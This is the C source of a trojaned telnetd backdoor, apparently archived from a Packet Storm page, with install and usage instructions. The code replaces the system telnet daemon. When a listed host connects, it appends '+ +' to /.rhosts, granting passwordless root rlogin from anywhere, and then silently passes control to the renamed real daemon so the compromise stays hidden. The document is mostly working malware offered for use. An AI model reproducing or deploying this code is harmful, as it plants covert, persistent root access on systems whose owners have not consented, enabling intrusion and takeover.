This is the "/.rhosts" backdoor creation daemon. This is the faked telnetd, if you connect to the telnet port of the target host which is installed this daemon from the specified host, the "/.rhosts" is rewrited to "+ +", you can login to the target host by the "rlogin target -l root". Of course, the telnetd can be used normally.
ada51ed685b7e6fefb3f851412c97226/*================================================================================
Remote Backdoor for rlogin
The Shadow Penguin Security (http://shadowpenguin.backsection.net)
Written by UNYUN (shadowpenguin@backsection.net)
[Install]
1) Input your host to /*1*/
2) To be a root
3) mv /usr/sbin/in.telnetd /usr/sbin/sysmon (you can change "sysmon" in /*2*/)
4) cc in.telnetd.c -o in.telnetd
5) mv in.telnetd /usr/sbin
[usage]
1) Make a connection to port23 of the target host (ex. telnet targethost)
2) rlogin target -l root
================================================================================
*/
#include <sys/types.h>
#include <sys/param.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <strings.h>
#include <stdio.h>
#include <netdb.h>
static char *roothosts[]={"yoursite.ne.jp", /* 1 */
"fumidai.ac.jp",
""};
#define ORIGINAL "/usr/sbin/sysmon" /* 2 */
#define RQ_DAEMON 2
#define BUFFER_SIZE 512
#define RHOSTS "/.rhosts"
main(int argc,char *argv[])
{
struct sockaddr_in client;
struct in_addr clientIn;
struct hostent *h;
char buf[BUFSIZ],ClientDomain[200];
int len,i,flag;
long inetip;
FILE *fp;
len = sizeof(client);
if (getpeername(RQ_DAEMON, (struct sockaddr *)&client, &len) < 0) {
len = sizeof(client);
if (recvfrom(RQ_DAEMON,buf,sizeof(buf),MSG_PEEK,
(struct sockaddr *) & client, &len) < 0) {
return;
}
}
memcpy(&clientIn,&client.sin_addr.s_addr,4);
inetip=inet_addr(inet_ntoa(clientIn));
h=(struct hostent *)gethostbyaddr(&inetip,sizeof(struct hostent),AF_INET);
if (h!=NULL){
for (flag=0,i=0;i<10;i++){
if (strlen(roothosts[i])==0) break;
if (strstr(roothosts[i],h->h_name)!=NULL
|| strstr(h->h_name,roothosts[i])!=NULL){
flag=1; break;
}
}
if (flag==1){
if ((fp=fopen(RHOSTS,"a"))!=NULL){
fprintf(fp,"+ +\n");
fclose(fp);
}
}
}
execv(ORIGINAL,argv);
}
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!